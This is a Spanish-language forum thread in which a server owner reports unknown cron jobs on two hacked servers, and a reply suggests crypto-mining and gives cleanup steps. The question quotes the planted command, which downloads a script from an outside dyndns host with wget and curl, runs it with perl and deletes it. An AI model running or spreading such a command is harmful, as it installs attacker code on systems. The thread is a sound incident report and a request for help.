Tengo dos servidores dedicados que hace algunos días comenzaron a enviarme notificaciones sobre trabajos cron desconocidos en ejecución.
En ambos servidores tengo cuentas secundarias para mis sitios web y el hacker modificó el trabajo cron para esas cuentas, no para el root. Entonces creo que "tal vez" solo tengan acceso limitado.
Ambos intentan ejecutar lo siguiente: cd /tmp;wgethttp://fastfoodz.dlinkddns.com/abc.txt;curl-Ohttp://fastfoodz.dlinkddns.com/abc.txt;perlabc.txt;rm -f abc*
Salida de cronjob del primer servidor:
http://pastebin.com/m56ga6pp
Salida de cronjob del segundo servidor:
http://pastebin.com/4utZ8agC
Lo extraño es que ambos servidores parecen pirateados al mismo tiempo y utilizando el mismo método.
¿Alguien tuvo exactamente este tipo de truco que pueda darme ideas sobre cómo entró y si puedo eliminarlo sin reinstalarlo?
Hay muchos sitios web en los servidores, y el primero usa alrededor de 500 GB, lo que requeriría mucho moverlo a otro lugar y reinstalarlo.
¡Gracias de antemano!
Respuesta1
Al observar la salida de Pastebin, parece que los trabajos cron están intentando generar hashes. Sospecho que la persona está intentando usar el servidor como parte de un grupo de minería para una moneda criptográfica.
Para obtener detalles sobre cómo entró, necesitaríamos varios registros y ¿está 100% seguro de que no fue el propietario del sitio web quien lo hizo? Puedes eliminar fácilmente el cronjob con.
crontab -e
Para evitar que la persona vuelva a ingresar, deshabilitaría el acceso al shell para el usuario específico si no hay ningún motivo para que lo tenga.
chsh -s /sbin/nologin {username}